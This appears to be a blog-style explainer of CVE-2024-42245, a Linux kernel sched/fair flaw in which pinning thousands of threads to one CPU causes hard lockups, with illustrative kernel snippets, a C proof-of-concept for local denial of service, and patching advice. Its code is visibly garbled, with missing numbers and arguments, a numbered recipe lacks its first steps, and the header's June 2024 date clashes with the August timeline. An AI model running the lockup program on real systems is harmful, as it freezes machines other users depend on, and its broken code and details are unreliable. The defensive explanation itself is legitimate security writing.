CVE-2024-42245 - O(n) Iteration Vulnerability in Linux Kernel’s sched/fair Leading to Hard Lockups

Published: June 2024

Severity: High (DoS / Hard lockup risk)

A critical vulnerability, identified as CVE-2024-42245, was resolved in the Linux kernel scheduler code (sched/fair). This issue could cause hard lockups in systems running an affected kernel, and was notably reproducible in environments with heavy thread CPU affinity usage—where thousands of threads are pinned to a single core.

This article provides an exclusive, simple-to-understand explanation of what happened, how the bug could be exploited, code snippets demonstrating the problem, and links to official sources.

What’s the Story? How Did CVE-2024-42245 Happen?

In kernel commit bdefa7ae03ecf91b8bfd10ede430cff12fcbd06, a developer aimed to improve load balancing in the scheduler. The update made the kernel’s CPU load balancing logic more “aggressive” by ignoring its previous limit on the number of scheduling loops (env.max_loop) whenever all tasks so far were “pinned” (hardbound to a CPU, so they can’t move). This was supposed to help in unearthing movable tasks buried in huge lists of unmovable ones.

But—disaster struck. In real-world use, especially with workloads liking thread pinning (affinity), this new logic could result in the system traversing massive task lists (think: 10,000+ threads all pinned to a single CPU). And, since the kernel does this load balancing with critical per-CPU scheduler locks held (and in "softirq" context), the resulting O(n) loop made the whole CPU hang—triggering hard lockups, an unrecoverable freeze.

Quick Code Walkthrough: Where Was the Problem?

The core issue was with how the scheduler’s detach_tasks() function interacts with per-CPU run queue task lists.

Here’s a simplified, illustrative snippet

// env.max_load_balance attempts to limit work
for_each_task_on_cpu(cpu) {
    if (task_pinned(task))
        continue; // skip, can't move

    // Try to detach a movable task...
    break;
}

The problematic change removed the loop limiter when tasks are pinned

// Before the buggy commit:
int loops = ;
for_each_task_on_cpu(cpu) {
    if (loops++ >= env.max_loads) break;
    if (task_pinned(task)) continue;
    // try_detach...
}

// After the buggy commit:
// The loop break on env.max_loads is *ignored* if tasks are pinned
for_each_task_on_cpu(cpu) {
    if (task_pinned(task)) continue;
    // try_detach...
    // ...the loop runs through *every* task if they're all pinned!
}

This change might seem innocent for small CPUs, but with 10,000 pinned threads, it leads to traversing 10,000 tasks—locking up the scheduler and the CPU.

Exploiting CVE-2024-42245: Easy Local (DoS)

Anyone with the ability to set thread affinity and create many threads can trigger this kernel hard lockup. Here’s a simple recipe:

Kick off activity across these threads (so the scheduler needs to balance them).

4. Observe kernel hard lockups / system freeze.

Example (Python with C extension or pure C)

#define _GNU_SOURCE
#include <pthread.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#define THREADS 10000

void* f(void* d) {
    cpu_set_t c;
    CPU_ZERO(&c);
    CPU_SET(, &c);
    sched_setaffinity(, sizeof(c), &c);
    while (1) {} // Busy wait
}

int main() {
    pthread_t th[THREADS];
    for (int i=; i<THREADS; ++i)
        pthread_create(&th[i], , f, );
    for (int i=; i<THREADS; ++i)
        pthread_join(th[i], );
}

*Don’t run this on a production machine!*

Impact and Risk

- Affected: Linux kernels including the patch bdefa7ae03ecf91b8bfd10ede430cff12fcbd06, mostly from mid-2023 to June 2024.
- Impact: Any local user (non-root needed!) can hang a CPU, causing a full disruption or DoS (Denial of Service).
- Triggers: Massive thread affinity usage (attackers, HPC, bad apps, CI/CD with thread pinning).
- Resolution: Revert the breaking patch and restore max loops limiter without exception.

Fix & Resolution

Official Fix:

The kernel team reverted the problematic commit. See

- Linus’ git revert commit
- Mail thread on LKML — with discussion led by Peter Zijlstra, Vincent Guittot, and others.

Fixed commit message snippet

Revert "sched/fair: Make sure to try to detach at least one movable task"

This reverts commit bdefa7ae03ecf91b8bfd10ede430cff12fcbd06.
...

Patch Status:

How To Protect Yourself

- Update your kernel to a version with the faulty patch reverted (6.10-rc4 or later, or vendor kernel with fix backported).

Monitor for suspicious thread pinning: If multi-user server, monitor massive affinity setting.

- Rate-limit user threads (set user process/thread limits), especially from untrusted or containerized workloads.

References

- Linus’ Revert Commit
- Original (bad) commit
- LKML discussion & context
- CVE page (NVD) *(Note: Page may lag official kernel fix)*

In summary:
CVE-2024-42245 made it easy for anyone to lock up a Linux CPU just by pinning enough threads, due to removed loop limits in the scheduler. The safest fix is to update your kernel as soon as possible.

If you manage Linux systems exposed to untrusted code or heavy affinity use, patch now!

Timeline

Published on: 08/07/2024 16:15:47 UTC
Last modified on: 08/08/2024 14:53:19 UTC